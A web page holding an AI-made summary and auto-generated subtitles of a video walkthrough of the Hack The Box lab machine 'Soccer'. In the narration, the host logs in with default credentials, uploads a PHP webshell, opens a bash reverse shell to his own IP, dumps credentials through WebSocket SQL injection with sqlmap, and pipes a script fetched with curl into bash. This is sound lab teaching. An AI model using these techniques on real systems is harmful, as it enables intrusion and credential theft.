HackTheBox - Soccer

00:36:35
https://www.youtube.com/watch?v=V_CkT7xyiCc

Summary

TLDRIn this video, the host, ipsec, conducts a penetration testing walk-through on the 'soccer' machine from Hack The Box. The process begins with using DirBuster to identify a vulnerable file management utility on the server. Default credentials are used to log in and upload a malicious PHP shell, enabling shell access on the server. The next step involves discovering a Boolean-based SQL injection vulnerability within a WebSocket connection, allowing the extraction of database credentials using SQLMap. After gaining SSH access with extracted credentials, the video details various methods for privilege escalation, focusing on exploiting a configured 'doas' command that permits executing the dstat tool for executing custom scripts, ultimately allowing the presenter to gain root access on the machine.

Takeaways

  • 🔍 Use DirBuster for directory enumeration.
  • 🔑 Log in with default credentials to access file management tools.
  • 🛠️ Upload a malicious PHP shell for command execution.
  • ⚠️ Exploit Boolean-based SQL injection vulnerabilities.
  • 🗃️ Use SQLMap to automate database extraction.
  • 📡 Analyze WebSocket connections for vulnerabilities.
  • 💻 SSH into the machine with extracted credentials.
  • ⚙️ Discover special permissions with 'doas'.
  • 📜 Craft a script for privilege escalation with 'dstat'.
  • 🚀 Achieve root access through scripted exploits.

Timeline

  • 00:00:00 - 00:05:00

    In this video, the narrator demonstrates how to exploit an easy Linux machine named "soccer" from Hack The Box. The initial step involves using dirbust to scan the web server and identify the presence of a file management utility. This leads to logging in using default credentials and uploading a PHP shell to gain access to the system.

  • 00:05:00 - 00:10:00

    After obtaining a shell through the uploaded PHP file, the narrator inspects the web server's second site which uses WebSocket technology. A Boolean-based SQL injection vulnerability is discovered, allowing further database exploitation using SQLMap to dump credentials and access the box via SSH.

  • 00:10:00 - 00:15:00

    The SSH access reveals that the sudo-like application named "dues" allows the user to execute commands as root. The narrator emphasizes the potential of this application, which paves the way for privilege escalation after exploring the box.

  • 00:15:00 - 00:20:00

    The narrator conducts Nmap scans, identifying key open ports such as SSH and HTTP. Additionally, they explore the web configurations using Burp Suite, showing how to manage DNS caching issues that can arise when testing the web application.

  • 00:20:00 - 00:25:00

    The narrative reveals challenges during the exploitation phase, including troubleshooting web requests and establishing connections through Burp Suite. They attempt to enumerate hidden directories and utilize GoBuster to find a path leading to the h3k tiny file manager.

  • 00:25:00 - 00:30:00

    The next key step involves gaining access to the tiny file manager and uploading a PHP shell for command execution. The narrator demonstrates how to manipulate the commands to fetch a shell with minimal bad characters by using URL encoding.

  • 00:30:00 - 00:36:35

    Toward the end, the viewer learns about the process of privilege escalation and interacting with a dstat command configured with 'doas'. The final exploitation point allows the narrator to execute their script as root, thus culminating in the successful capture of the root.txt file, completing the box.

Show more

Mind Map

Video Q&A

  • What tool is used for directory brute-forcing?

    DirBuster is used for directory brute-forcing.

  • How is the PHP shell uploaded?

    The PHP shell is uploaded via a file management utility after logging in with default credentials.

  • What SQL injection technique is demonstrated?

    Boolean-based SQL injection is demonstrated using WebSockets.

  • How is SQLMap used in the process?

    SQLMap automates the extraction of the database by exploiting the SQL injection vulnerability.

  • What is 'doas' in the context of this video?

    'doas' is a BSD command similar to 'sudo' that allows executing commands as another user.

  • How is the dstat command exploited for privilege escalation?

    By placing a script in a writable directory and using 'doas' to execute it, root access is obtained.

View more video summaries

Get instant access to free YouTube video summaries powered by AI!
Subtitles
en
Auto Scroll:
  • 00:00:00
    what's going on YouTube this is ipsec
  • 00:00:01
    I'm doing soccer from hack the box which
  • 00:00:03
    is a easy Linux machine that starts out
  • 00:00:05
    with just running dirt Buster against a
  • 00:00:08
    website to discover a file management
  • 00:00:10
    utility is installed on the web server
  • 00:00:12
    Googling it finding default credentials
  • 00:00:15
    you can log in upload a PHP shell and
  • 00:00:17
    get a shell on the box with that shell
  • 00:00:19
    you can look at the web server itself
  • 00:00:22
    and discover there is a second version
  • 00:00:23
    of the website this one has some
  • 00:00:26
    websocket technology in it and if you
  • 00:00:28
    intercept the websocket you discover it
  • 00:00:30
    is vulnerable to a Boolean based SQL
  • 00:00:34
    injection so you can use SQL map to
  • 00:00:37
    automate dumping that database get some
  • 00:00:39
    credential to the Box log in with SSH
  • 00:00:41
    and once you start poking around you'll
  • 00:00:43
    discover that sudo you know not pseudo
  • 00:00:46
    but an application like studio called
  • 00:00:48
    dues is configured for your user that
  • 00:00:50
    lets you execute commands as the root
  • 00:00:52
    user so that is how you prevask with
  • 00:00:55
    that being said let's just jump in as
  • 00:00:57
    always we're going to start with and map
  • 00:00:58
    so Dash SC for default all scripts as
  • 00:01:00
    the enumerate versions OA output all
  • 00:01:03
    formats when the nmap directory and call
  • 00:01:04
    it soccer then the IP address of 10 10
  • 00:01:07
    11.194 this can take some time to run so
  • 00:01:10
    I've already ran it looking at the
  • 00:01:12
    results we have just three ports open
  • 00:01:14
    the first one being SSH on Port 22 from
  • 00:01:17
    the banner we can see it's a new Ubuntu
  • 00:01:19
    Server we also have HTTP open on Port
  • 00:01:22
    80. it is running engine X also on
  • 00:01:25
    Ubuntu and it is telling us it is
  • 00:01:27
    forwarding all requests to soccer.hdb so
  • 00:01:30
    we should add that to the host file
  • 00:01:31
    right now but I'm going to hold off a
  • 00:01:33
    bit just because I want to show a little
  • 00:01:34
    burp sweet DNS caching thing that I've
  • 00:01:36
    seen a lot of people complain about so
  • 00:01:38
    we'll just show that
  • 00:01:39
    um a little scenario in a minute we also
  • 00:01:42
    have Port 1991 open burp Suite doesn't
  • 00:01:44
    know what it is but based upon this
  • 00:01:46
    request I'm going to say this is an HTTP
  • 00:01:50
    server or just a web server right
  • 00:01:53
    um and here's the page it's sending back
  • 00:01:55
    it's a 404 page and I see this pre
  • 00:01:58
    cannot get slash pre I'm gonna guess
  • 00:02:00
    this ID node.js just because I've seen
  • 00:02:02
    this so much with node.js things we
  • 00:02:05
    could go over to Google and Google this
  • 00:02:07
    and the first result is node.js the
  • 00:02:09
    second result is node.js third and
  • 00:02:11
    fourth no JS so I'm gonna guess it's
  • 00:02:14
    node.js I want to say like Googling
  • 00:02:16
    fiber may also use this but I don't
  • 00:02:18
    think it puts the pre before and after
  • 00:02:20
    it but um node.js is definitely going to
  • 00:02:23
    be the most common one so since this is
  • 00:02:25
    a web server we don't really have
  • 00:02:27
    anything there um we could try hitting
  • 00:02:29
    it so if we went to 10 10 11 194 was it
  • 00:02:33
    90 91
  • 00:02:34
    uh we just get that cannot get page and
  • 00:02:37
    then if we go to
  • 00:02:40
    um the actual box I want to make sure
  • 00:02:41
    I'm going through burp Suite so I set
  • 00:02:43
    rep Suite on intercept is off but it
  • 00:02:45
    still goes through this tool
  • 00:02:47
    it's going to redirect us to soccer.hdb
  • 00:02:50
    and we got this and at this point Java
  • 00:02:53
    is going to Cache the DNS so even if we
  • 00:02:55
    add soccer.hdb here so 10 10 11 194
  • 00:02:59
    soccer.htb
  • 00:03:01
    refresh this it's still gonna resolve to
  • 00:03:05
    nothing
  • 00:03:06
    um it's super annoying I don't know
  • 00:03:08
    exactly how to clear the cache it clears
  • 00:03:09
    eventually but I can take burp Suite off
  • 00:03:12
    we get here I put burp sweet back on uh
  • 00:03:15
    it's gonna go back to the error page
  • 00:03:16
    right so if you get that
  • 00:03:18
    um just take rip Suite off play around
  • 00:03:20
    with the site a little bit and then go
  • 00:03:21
    back to brip suite and you will be fine
  • 00:03:23
    so looking at this it looks like it is a
  • 00:03:27
    football club we have this we love
  • 00:03:29
    soccer thing here and some news and
  • 00:03:31
    clicking around we can't really get to
  • 00:03:33
    any page I'm going to press Ctrl U to go
  • 00:03:36
    to the source and what I'm looking at
  • 00:03:37
    here is if we can see what this page is
  • 00:03:41
    built with is this like a WordPress do I
  • 00:03:43
    see WP Dash do I see Joomla this just
  • 00:03:46
    looks like some type of static site
  • 00:03:48
    um there are jpegs we could look at like
  • 00:03:51
    the metadata but I'm not seeing anything
  • 00:03:54
    too interesting here
  • 00:03:57
    um
  • 00:03:57
    I wonder if the HTML is broken because
  • 00:04:00
    that style is written I don't see like a
  • 00:04:03
    um
  • 00:04:04
    style up here so I think
  • 00:04:06
    just a bad clone of it or maybe that's
  • 00:04:08
    supposed to be this but
  • 00:04:11
    I don't really get anything from it I
  • 00:04:13
    don't see any unique like JavaScript
  • 00:04:15
    files to go down so we can either try
  • 00:04:17
    like virtual host enumeration or Dura
  • 00:04:20
    busting and I'm just going to do dirt
  • 00:04:21
    busting in this case but you should
  • 00:04:22
    probably do both and I'm going to do go
  • 00:04:24
    Buster dir Dash U saka.hdb then we'll do
  • 00:04:28
    opt sex list
  • 00:04:31
    um
  • 00:04:32
    what is it
  • 00:04:34
    let's see discovery
  • 00:04:37
    web content then
  • 00:04:41
    uh Rat small words dot text
  • 00:04:49
    and let's see if we get any hits right
  • 00:04:51
    off the bat
  • 00:04:52
    uh while that goes we probably could
  • 00:04:54
    identify if this is HTML or PHP I didn't
  • 00:04:57
    really do that just because it was nginx
  • 00:04:59
    I really see.php on nginx but while good
  • 00:05:03
    Buster runs we can track index.html
  • 00:05:05
    index whoops dot PHP
  • 00:05:09
    uh only HTML comes back so it's probably
  • 00:05:12
    going to be just a static site we still
  • 00:05:15
    don't have any hits on Go Buster we can
  • 00:05:18
    check if our brip sweets cleared the
  • 00:05:20
    cash yet it looks like it has as now we
  • 00:05:23
    can hit this page but I'm gonna wait for
  • 00:05:26
    Go Buster to finish and now that it's
  • 00:05:29
    complete we can see there was a page on
  • 00:05:32
    Tiny so let's go take a look at what
  • 00:05:35
    this URL and going to it we get h3k the
  • 00:05:39
    tiny file manager so we can just try to
  • 00:05:41
    log in with admin password
  • 00:05:44
    um looks like invalid username password
  • 00:05:46
    we can try Googling this so I'm going to
  • 00:05:48
    go h3k tiny file manager
  • 00:05:52
    and let's see
  • 00:05:55
    we have a remote code execution exploit
  • 00:05:58
    there
  • 00:05:59
    I'm guessing there's going to be some
  • 00:06:00
    random application on GitHub
  • 00:06:04
    and we have it here as well if we look
  • 00:06:06
    at this exploit
  • 00:06:08
    let's see exactly what it's doing it's
  • 00:06:10
    looking for JQ
  • 00:06:12
    um it wants username and password so we
  • 00:06:16
    need it
  • 00:06:17
    it's giving us the password of admin at
  • 00:06:19
    one two three I'm guessing this is going
  • 00:06:21
    to be the default if it put it in there
  • 00:06:24
    default username password according this
  • 00:06:27
    admin admin at 123 and user12345 so
  • 00:06:30
    let's try both of these so we can try
  • 00:06:32
    admin
  • 00:06:34
    and then this password
  • 00:06:36
    and we get logged in
  • 00:06:39
    so since we are at a file manager it's
  • 00:06:41
    probably got a way to upload files I'm
  • 00:06:44
    just going to go into the uploads
  • 00:06:46
    directory
  • 00:06:47
    and then
  • 00:06:49
    hit upload and I'm going to drop a PHP
  • 00:06:52
    file here so I'm just going to do V
  • 00:06:54
    it'll call it show.php
  • 00:06:57
    and then we'll do system
  • 00:07:00
    request
  • 00:07:03
    um and I'll give the parameter the name
  • 00:07:05
    of CMD
  • 00:07:08
    and let's see
  • 00:07:10
    let us go to a place that we can drag
  • 00:07:12
    and drop it or maybe we can just click
  • 00:07:13
    on it yeah we can so I'm going to do
  • 00:07:18
    hdb
  • 00:07:19
    uh the Box's name was soccer
  • 00:07:23
    and let's try uploading show.php and see
  • 00:07:25
    what happens
  • 00:07:26
    it looks like it just uploaded I was
  • 00:07:29
    expecting it to say like this file type
  • 00:07:30
    is not allowed or something so let's go
  • 00:07:33
    take a look at it so if I go to Tiny it
  • 00:07:37
    was uploads after that and then
  • 00:07:39
    shell.php
  • 00:07:41
    it looks like we can execute I'm going
  • 00:07:43
    to do question mark CMD
  • 00:07:45
    is equal to who am I
  • 00:07:47
    and we get www data so let's just go and
  • 00:07:50
    get a shell I'm going to turn my burp
  • 00:07:52
    Suite on to intercept just because it's
  • 00:07:54
    easier to do it
  • 00:07:56
    um in the well not repeat or tab but
  • 00:07:58
    just as a post request because you have
  • 00:07:59
    less Bad characters to worry about so if
  • 00:08:02
    we change the request method to a post
  • 00:08:04
    then we can just do Bash
  • 00:08:07
    Dash C
  • 00:08:08
    then bash Dash I Dev TCP 10 10 14 8 9001
  • 00:08:14
    zero and one like that and then
  • 00:08:16
    highlight it Ctrl U to URL encode it
  • 00:08:19
    mainly the bad character is going to be
  • 00:08:21
    these ampersands or and signs because
  • 00:08:23
    that's also going to be the like
  • 00:08:25
    parameter separator and HTML so that's
  • 00:08:29
    why we URL encode it
  • 00:08:31
    so now I can do NC lvnp 9001 send this
  • 00:08:35
    request
  • 00:08:36
    and we get phone not found
  • 00:08:39
    I'm going to re-upload the file just in
  • 00:08:41
    case something got deleted
  • 00:08:45
    so refresh this page
  • 00:08:47
    upload shell.php
  • 00:08:50
    send it it's hanging because we have the
  • 00:08:53
    shell here
  • 00:08:54
    so let's do python3-c
  • 00:08:57
    import PTY PTY spawn Ben Bash
  • 00:09:03
    sdty raw minus Echo FG enter enter and
  • 00:09:08
    then export term is equal to X terms so
  • 00:09:11
    now we can clear the screen so now the
  • 00:09:13
    first thing I'm wondering is exactly
  • 00:09:15
    what is on Port
  • 00:09:16
    9091 if you're a member from our initial
  • 00:09:20
    thing if we went to soccer hdb 1991
  • 00:09:23
    it just says cannot get slash right but
  • 00:09:26
    now we can actually see what that like
  • 00:09:28
    node.js application is so I'm going to
  • 00:09:30
    do SS lntp we can see it is running here
  • 00:09:34
    we don't have a PID so I don't know
  • 00:09:36
    exactly what it is if I do PS Dash EF
  • 00:09:39
    dash dash Forest we don't see that much
  • 00:09:43
    we only see our processes
  • 00:09:46
    um and that's because I'm guessing Etsy
  • 00:09:48
    f-stab we have hide PID is equal to 2
  • 00:09:51
    which just means you can't see the
  • 00:09:53
    processes from another user we look at
  • 00:09:55
    the slash proc directory you'll notice
  • 00:09:57
    there's a lot less numbers in proc
  • 00:09:59
    because we just don't have access to it
  • 00:10:01
    so we can't enumerate 1991 based upon
  • 00:10:05
    the process so I'm going to go over to
  • 00:10:07
    like the engine X config so if we do
  • 00:10:10
    sites Dash enabled we can see default
  • 00:10:15
    and this is going to be the engine X
  • 00:10:16
    config for soccer.hdb it's just invert
  • 00:10:20
    www.html
  • 00:10:22
    and then there is a sock player.hdb so
  • 00:10:27
    let's take a look at this this is
  • 00:10:28
    listening on Port 80.
  • 00:10:31
    um it's DNS name is sockplayer.socca.hdb
  • 00:10:35
    and it's going to do a proxy pass to
  • 00:10:38
    localhost 3000 which is not 1991 that's
  • 00:10:42
    something different but it's a different
  • 00:10:45
    um application I don't know exactly what
  • 00:10:47
    this is so let's go add sockplayer.hdb
  • 00:10:52
    to our host file so I'm going to do sudo
  • 00:10:54
    VI Etsy host
  • 00:10:57
    add this
  • 00:10:59
    and then in a browser let's go to
  • 00:11:03
    sockplayer.socca.hdb and this looks very
  • 00:11:06
    similar to just soccer.hdb
  • 00:11:09
    the only difference is we have a few
  • 00:11:11
    more functions in this navigation bar
  • 00:11:13
    where we only had home here
  • 00:11:15
    we have home match login
  • 00:11:19
    and sign up so we can try logging in
  • 00:11:22
    with let's say admin
  • 00:11:24
    soccer.hdb password of password
  • 00:11:28
    and we get incorrect email or password
  • 00:11:31
    I'm going to try signing up so let's do
  • 00:11:34
    root ipsec.rocks
  • 00:11:37
    username of ipsec password of password
  • 00:11:40
    and let's try logging in
  • 00:11:45
    okay
  • 00:11:47
    and it says your ticket ID is 69330 we
  • 00:11:51
    have 10 days reminding for the match the
  • 00:11:53
    price is free I don't know exactly what
  • 00:11:55
    to put in here I'll put lead and we say
  • 00:11:57
    ticket does not exist I'm going to put
  • 00:12:00
    this and ticket does exist so this looks
  • 00:12:03
    like just
  • 00:12:05
    some Boolean enumeration type thing 29
  • 00:12:08
    doesn't exist if we do or one equals one
  • 00:12:11
    like this and a comment
  • 00:12:13
    uh we get ticket does not exist let's
  • 00:12:15
    get rid of the single quote and oh
  • 00:12:17
    ticket does exist let's do and two
  • 00:12:20
    equals one doesn't exist so we have a
  • 00:12:23
    standard SQL injection in this field so
  • 00:12:27
    let's Taiwan bibsweet real quick let's
  • 00:12:30
    make sure intercept is on
  • 00:12:32
    and or send this request
  • 00:12:34
    and when I hit enter
  • 00:12:37
    it's not going to brip Suite we have
  • 00:12:39
    ticket exist nothing
  • 00:12:42
    um so let's press F12
  • 00:12:45
    and see what happens on this repeater
  • 00:12:47
    tab
  • 00:12:51
    that's just a keep alive
  • 00:12:54
    I'm not saying anything let's just I
  • 00:12:56
    guess refresh the page
  • 00:13:00
    add Gateway
  • 00:13:02
    please log in I guess we have to create
  • 00:13:04
    the account again
  • 00:13:08
    let's see
  • 00:13:09
    check dot rocks password
  • 00:13:13
    uh ipsec password
  • 00:13:20
    log in
  • 00:13:29
    so ticket exist if we intercept
  • 00:13:32
    let's do two equals one
  • 00:13:34
    now it is
  • 00:13:35
    and we're getting a websocket so
  • 00:13:39
    um I think when you intercept a
  • 00:13:41
    websocket connection you have to make
  • 00:13:43
    sure you intercept the connection
  • 00:13:44
    request too so you can't just toggle it
  • 00:13:46
    on in middle of the page and then
  • 00:13:47
    intercept it you have to start
  • 00:13:49
    intercepting from the very beginning
  • 00:13:51
    so that's probably why we weren't seeing
  • 00:13:53
    it beforehand the other thing to keep in
  • 00:13:55
    mind is always go to proxy settings
  • 00:13:58
    and there is websocket right here to
  • 00:14:01
    make sure you intercept that but now we
  • 00:14:03
    have discovered it is using websockets
  • 00:14:06
    and if I just send the request
  • 00:14:09
    um I'm not getting a response back we
  • 00:14:10
    see the direction is to server
  • 00:14:13
    so what I'm actually going to do
  • 00:14:16
    is click this to disconnect
  • 00:14:19
    I'm going to reconnect to this websocket
  • 00:14:21
    and then send it and now we get ticket
  • 00:14:23
    does not exist so we had to re-establish
  • 00:14:26
    the websocket stream as well in the
  • 00:14:28
    repeater window websockets are funny
  • 00:14:32
    um and don't always work as you'd expect
  • 00:14:34
    but now that we have this
  • 00:14:37
    um
  • 00:14:38
    we need to get this over into like SQL
  • 00:14:41
    map or something because this is a
  • 00:14:44
    Boolean injection right I don't want to
  • 00:14:46
    manually do all of this by hand because
  • 00:14:50
    we're just getting it like one character
  • 00:14:52
    at a time not even that we're checking
  • 00:14:53
    if one character exists at a time that's
  • 00:14:55
    going to take a long time to do in this
  • 00:14:58
    repeater window if you want to know more
  • 00:15:00
    about Boolean injection I'm sure if you
  • 00:15:01
    go to ipsec.rocks and type Boolean
  • 00:15:03
    injection
  • 00:15:04
    um you'll probably hear me talk more
  • 00:15:06
    about it where we actually build like
  • 00:15:07
    Python scripts to do it manually but
  • 00:15:10
    um we don't have to do that every time
  • 00:15:13
    right but like explaining Boolean
  • 00:15:15
    injection I'd probably go to one of
  • 00:15:17
    these videos
  • 00:15:20
    so let's just try getting this over into
  • 00:15:24
    um SQL map so I'm going to copy it to a
  • 00:15:27
    file I'm going to say injection dot SQL
  • 00:15:30
    or what do you request
  • 00:15:32
    save it
  • 00:15:35
    and then we can cat
  • 00:15:37
    uh what do we call it injection.request
  • 00:15:40
    and we don't have any data about this so
  • 00:15:43
    SQL maps not going to know how to deal
  • 00:15:45
    with this if we just give it like the
  • 00:15:46
    dash R to read parameter file right so
  • 00:15:49
    what I'm going to try doing is SQL map
  • 00:15:52
    Dash U
  • 00:15:53
    and we can say WS colon slash slash
  • 00:15:58
    sock plant let's see
  • 00:16:01
    it's a websocket
  • 00:16:03
    sockplayer.htb 9091
  • 00:16:07
    like this is this going to work
  • 00:16:11
    um
  • 00:16:11
    a better way to do this is going to be
  • 00:16:13
    using application called WS cat
  • 00:16:15
    so we can do WS cat first Dash C
  • 00:16:19
    sockplayer.htb 9091
  • 00:16:22
    uh uh entry not found
  • 00:16:26
    not found
  • 00:16:29
    let's see
  • 00:16:34
    oh um
  • 00:16:36
    dot soccer Dot hdb there we go
  • 00:16:40
    so I want to send this real quick
  • 00:16:45
    take it exist
  • 00:16:47
    okay
  • 00:16:49
    so that is a valid thing for a websock
  • 00:16:51
    and I wonder if I needed that slash WS
  • 00:16:55
    I don't think I did a lot of web sockets
  • 00:16:58
    may have slash WS on it or not but it
  • 00:17:00
    doesn't look like I need to we just need
  • 00:17:02
    to make sure
  • 00:17:04
    we put the soccer.hdb here
  • 00:17:08
    there we go
  • 00:17:10
    and then
  • 00:17:12
    how do we do payload in SQL map uh man
  • 00:17:16
    SQL map I think it's Dash D yeah Dash D
  • 00:17:19
    for data
  • 00:17:22
    and what we're going to do
  • 00:17:25
    is just put star and what star is going
  • 00:17:27
    to do is manually tell SQL map
  • 00:17:31
    um this is where we want to inject
  • 00:17:33
    then we can do dash dash batch
  • 00:17:38
    uh let's see D is incompatible with you
  • 00:17:42
    so let's see exactly what D was I
  • 00:17:45
    thought it was data
  • 00:17:50
    uh dash dash data is what I want
  • 00:17:54
    let's try dash dash data
  • 00:17:58
    there we go that works and all batch
  • 00:18:00
    mode is going to do is auto submit um
  • 00:18:02
    the default for everything so
  • 00:18:05
    um
  • 00:18:06
    found in Paris by do you want to process
  • 00:18:07
    it yes Json data do you want to process
  • 00:18:09
    it yes whatever but it's just going to
  • 00:18:12
    answer all the questions so we can just
  • 00:18:14
    let SQL map go on its own right so here
  • 00:18:18
    it is going to be testing for various
  • 00:18:20
    things and hopefully it ends up finding
  • 00:18:23
    something and I want to see exactly
  • 00:18:25
    while that goes
  • 00:18:27
    um actually we can do it like this
  • 00:18:31
    let's see actually
  • 00:18:34
    postpram does not appear to be
  • 00:18:36
    injectable
  • 00:18:42
    let's take batch mode off
  • 00:18:45
    custom injection do you want to process
  • 00:18:47
    yes
  • 00:18:49
    yes
  • 00:18:50
    that's what we did
  • 00:18:52
    um
  • 00:18:54
    let's see
  • 00:18:59
    if we do technique equals B for Boolean
  • 00:19:03
    and risk three level five
  • 00:19:09
    let's do batch mode again
  • 00:19:19
    see dbms
  • 00:19:22
    trying to figure out what Dash D is I
  • 00:19:24
    don't think it's DB maybe it is
  • 00:19:34
    I'm not exactly sure what just Dash
  • 00:19:36
    lowercase D was and why it wasn't
  • 00:19:38
    compatible with the you it's definitely
  • 00:19:40
    not like databases to enumerate
  • 00:19:43
    but it must be something
  • 00:19:46
    so let's see if it finds it now with the
  • 00:19:48
    risk and level set a bit higher I'm just
  • 00:19:51
    gonna pause the video and resume when
  • 00:19:53
    SQL map is done and it looks like that
  • 00:19:56
    did the trick we have a Boolean based
  • 00:19:58
    blind injection SQL map so now we can do
  • 00:20:01
    dash dash DBS to get a list of the
  • 00:20:05
    databases and then after that we can
  • 00:20:07
    specify
  • 00:20:09
    um
  • 00:20:10
    the dump feature right and the whole
  • 00:20:12
    reason why I'm doing dash dash DBS is I
  • 00:20:15
    don't want to dump like information
  • 00:20:17
    schema and everything like that because
  • 00:20:18
    you can see how slow this is actually
  • 00:20:21
    going if we dumped all the every
  • 00:20:24
    database which is five in this case
  • 00:20:28
    um we'd be here for much longer than
  • 00:20:30
    nmap takes to run right we can see
  • 00:20:33
    exactly how slow this is going we can
  • 00:20:34
    probably speed this up with dash dash
  • 00:20:36
    threads 10. let's see
  • 00:20:39
    if this speeds it up any
  • 00:20:42
    so we got five
  • 00:20:44
    there we go and you know it's threaded
  • 00:20:46
    now because
  • 00:20:48
    we have
  • 00:20:49
    um
  • 00:20:51
    like these underscores here and it gets
  • 00:20:54
    multiple simultaneously so
  • 00:20:57
    um there's going to be 10 different
  • 00:20:58
    underscores whenever it knows the length
  • 00:21:00
    it wants to get or 10 that works
  • 00:21:03
    simultaneously so this is probably 10 as
  • 00:21:04
    we see 10 18 and that does the other
  • 00:21:06
    ones right so this is going much quicker
  • 00:21:09
    this one is length of three of course
  • 00:21:12
    that's going to be CIS length of nine
  • 00:21:16
    um
  • 00:21:17
    soccer underscore DB so that's the
  • 00:21:19
    database we want so instead of DBS
  • 00:21:24
    we can specify the dash capital D flag
  • 00:21:26
    Saco DB dash dash dump we could also
  • 00:21:31
    like dump a list of all the tables and
  • 00:21:33
    then go fetch the exact table we want
  • 00:21:36
    that may be the better way to go about
  • 00:21:38
    this but
  • 00:21:40
    um I'm assuming there's not much
  • 00:21:41
    information in this table right so we
  • 00:21:44
    have accounts there are I guess four
  • 00:21:46
    accounts the first one is a length of
  • 00:21:49
    five
  • 00:21:50
    so oh four uh columns and accounts so we
  • 00:21:54
    got email ID let's see the next one is
  • 00:21:57
    eight
  • 00:21:59
    um username
  • 00:22:00
    password okay
  • 00:22:02
    um eight here is this one going to be
  • 00:22:04
    username
  • 00:22:06
    yes
  • 00:22:07
    so now it's going to dump the first one
  • 00:22:09
    there is one account
  • 00:22:11
    17 letters so this is probably going to
  • 00:22:14
    be an email player at
  • 00:22:18
    player.htb
  • 00:22:19
    the next is four characters
  • 00:22:23
    one three two four I think that was the
  • 00:22:25
    ID
  • 00:22:27
    20 is going to be a password
  • 00:22:30
    and it's in plain text so we have player
  • 00:22:33
    of the match 2022.
  • 00:22:37
    and then the username of player
  • 00:22:41
    so this is definitely the password where
  • 00:22:43
    it's telling us right here what goes to
  • 00:22:44
    what
  • 00:22:46
    um
  • 00:22:46
    we just got a username and password to
  • 00:22:49
    this application we can try logging into
  • 00:22:51
    the app so if I go back here let's log
  • 00:22:54
    out
  • 00:22:55
    login
  • 00:22:57
    player at player.htb
  • 00:23:01
    player of the match
  • 00:23:03
    and we don't have any like extra
  • 00:23:04
    functionality I was expecting like a
  • 00:23:06
    slash admin or something here right but
  • 00:23:09
    we don't exactly have anything these
  • 00:23:12
    links don't go live so let's go back to
  • 00:23:16
    Earth shell and a cat Etsy pass WD grip
  • 00:23:20
    for everything that ends in sh because
  • 00:23:22
    there's going to be shells and we do
  • 00:23:24
    have a username called player so maybe
  • 00:23:28
    we can just SSH with this password so
  • 00:23:30
    I'm going to do SSH player at 10 10 11
  • 00:23:34
    194 I think with soccer
  • 00:23:37
    yes
  • 00:23:39
    put in this password
  • 00:23:42
    and we get logged in and that's where
  • 00:23:45
    user.txt is
  • 00:23:47
    so we can look at the PS output again to
  • 00:23:49
    see if we see anything other but again
  • 00:23:51
    since we can only see our own processes
  • 00:23:53
    there's not much here and now we don't
  • 00:23:56
    have any questions because we know
  • 00:23:58
    exactly what 1991 goes to I guess we
  • 00:24:00
    could see if we can interact with this
  • 00:24:02
    application I do lsla here I don't see
  • 00:24:04
    anything we could do a fine slash
  • 00:24:08
    um Dash user player output errors to Dev
  • 00:24:11
    null see if there's anything else here
  • 00:24:15
    um let's get rid of
  • 00:24:18
    proc
  • 00:24:20
    and run
  • 00:24:24
    and see if we have anything else uh we
  • 00:24:26
    need a grep dash V to remove them
  • 00:24:30
    we can also remove anything that begins
  • 00:24:32
    with CIS
  • 00:24:37
    and there's really
  • 00:24:38
    nothing owned by player we can check our
  • 00:24:41
    groups and we're also in the group
  • 00:24:42
    called player and do this so we do group
  • 00:24:45
    Player
  • 00:24:47
    and
  • 00:24:48
    we have actually I did not expect this
  • 00:24:51
    user shared d-stat so if I look at this
  • 00:24:55
    it is a directory
  • 00:24:58
    that we can I guess write to but I don't
  • 00:25:01
    know exactly what dstat is so
  • 00:25:05
    let's do find Dash name dstat
  • 00:25:09
    pipe to errors
  • 00:25:13
    we have dstat here let's do pseudo-l uh
  • 00:25:17
    password for player that was in
  • 00:25:21
    where was that that was SQL map and
  • 00:25:25
    that is long gone
  • 00:25:27
    or is it we can go to CD dot
  • 00:25:30
    um is it config SQL map
  • 00:25:33
    let's see
  • 00:25:35
    escrow map breaks somewhere
  • 00:25:38
    local share
  • 00:25:43
    okay so let's see SQL map
  • 00:25:48
    history
  • 00:25:50
    let's go in output
  • 00:25:53
    we can go to Sock player
  • 00:25:57
    and then
  • 00:25:59
    dump
  • 00:26:01
    CD soccer DB CAD accounts we finally got
  • 00:26:05
    the player and this is why you should
  • 00:26:07
    always take notes when doing things
  • 00:26:08
    because even though we can still pull it
  • 00:26:10
    out that probably took like two minutes
  • 00:26:12
    of time if I just took notes we would
  • 00:26:14
    have saved it and we can't run anything
  • 00:26:16
    with it
  • 00:26:18
    um we can run stat against d-stat and
  • 00:26:20
    see exactly what this application is
  • 00:26:24
    if we have like set uid or anything
  • 00:26:26
    against it
  • 00:26:27
    doesn't look like we do it's just zero
  • 00:26:29
    seven five five with no
  • 00:26:32
    um special bits
  • 00:26:34
    so
  • 00:26:36
    let us go over to Lynn piece so GitHub
  • 00:26:40
    lint piece and see if this tells us
  • 00:26:43
    anything and the things we want to home
  • 00:26:44
    in on is like dstat and things like that
  • 00:26:48
    just because
  • 00:26:50
    um it's Unique to this group right
  • 00:26:52
    so let's download lynnps.sh
  • 00:26:57
    Ave it to a file
  • 00:27:01
    let's go it's going to exit reopen this
  • 00:27:08
    move downloads uh what was it limpys.sh
  • 00:27:12
    here python3 Dash m
  • 00:27:16
    HTTP server
  • 00:27:18
    girl 10 10 14 8 8
  • 00:27:20
    000
  • 00:27:21
    lynnps.sh pipe over to bash and I'm
  • 00:27:25
    going to pause the video and just let
  • 00:27:27
    this run and we'll see what it returns
  • 00:27:30
    so now that Lin piece is done we can
  • 00:27:32
    just go to the top and scroll down and
  • 00:27:36
    oh my God that is a lot highlighted
  • 00:27:39
    um
  • 00:27:41
    there we go I don't know what I did
  • 00:27:43
    there
  • 00:27:44
    but that looks better so I'm just going
  • 00:27:47
    to go down when I see red that catches
  • 00:27:49
    my eye I may look into it more the
  • 00:27:52
    pseudo version thing
  • 00:27:54
    um I don't know why it always highlights
  • 00:27:55
    and red I think it's just a bad regex
  • 00:27:57
    because the pseudo vulnerability it's
  • 00:28:00
    referencing I think came out like two or
  • 00:28:01
    three years ago so you probably wouldn't
  • 00:28:03
    see that on a box
  • 00:28:06
    um here it is in the Linux exploit
  • 00:28:08
    suggestion 2021 so yeah two to three
  • 00:28:10
    years ago and I've kind of got
  • 00:28:12
    desensitized to
  • 00:28:15
    um any type of Kernel exploits from
  • 00:28:16
    limpy's just because it's not always
  • 00:28:19
    kept up to date so
  • 00:28:21
    um I always see red there and then I
  • 00:28:24
    just take note of it and go back to it
  • 00:28:25
    if I don't see anything else and that's
  • 00:28:28
    like a last resort right because
